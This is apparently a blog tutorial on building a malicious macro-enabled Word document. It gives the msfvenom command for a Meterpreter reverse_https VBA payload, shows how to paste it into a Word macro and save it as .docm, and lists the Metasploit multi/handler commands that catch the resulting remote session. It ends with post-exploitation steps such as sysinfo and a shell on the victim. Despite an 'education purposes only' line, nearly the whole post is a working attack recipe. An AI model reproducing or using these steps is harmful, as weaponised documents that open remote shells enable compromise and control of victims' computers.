How to Create Malware Docs using Macro

What is Macro?

According to Microsoft, a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically.  You can automate frequently used tasks by creating and running macros in Word and Excel. 

For this method, we will be using 

1. Kali Linux
2. Metasploit
3. Word

***Note: This is for education purposes only

Steps

1.    First, we must first create a payload. MSFvenom will be used to build the payload. For this demonstration, we used the reverse http payload. We will use the command 
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.106 lport=1234 -f vba.  
For lhost,we stated the Attacker Machine's local IP address, which is Kali Linux. For lhost,we must also include a Local port on which the session will be created. 

2.    Then, we copy the vba payload content after generating the payload with the correct configuration for the vba payload and then pass on to the target computer as you can see in Image 1.

Image 1

3.    Open a Microsoft Office Word and click on "View" tab and click on "Macro" as in Image 2.

Image 2

4.    Then create a new macro. You can name it anything and as you can see in Image 3 I name it as "try" and click "Create" button. 

Image 3

5.    Then, click on "This Document" as shown in Image 4. 

Image 4

6.    Then, paste the vba payload that we copy on the second step as shwon in Image 5.

Image 5

7.    Click on "File" and "Save Document1" as shown in Image 6. 

Image 6

8. Then save the document as Word Macro-Enabled Document(*.docm).

Image 7

9.    After that, go to Kali Linux and launch Metasploit. 

Image 8

10.    Then, to prepare the connection with the victim, use command below. 
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.106
set lport 1234
exploit

Image 9

11.    Before you run the command exploit, you need to open the Word documents that we save earlier and click button "Enable Content" as shown in Image 10.

Image 10

12.    After you run the command exploit, you will see the host are connected because the Word document is open like in the Image 11. 

Image 11

As you can see in Image 11, I use sysinfo command  to know the victim system environment. The shell command will present you with a standard shell on the victim system. Then, we can try make a new file on the victim system as in Image 12 or open calculator as in Image 13. 

Image 12

Image 13

Comments

Popular posts from this blog

OvertheWire

In Memory Attack Writeup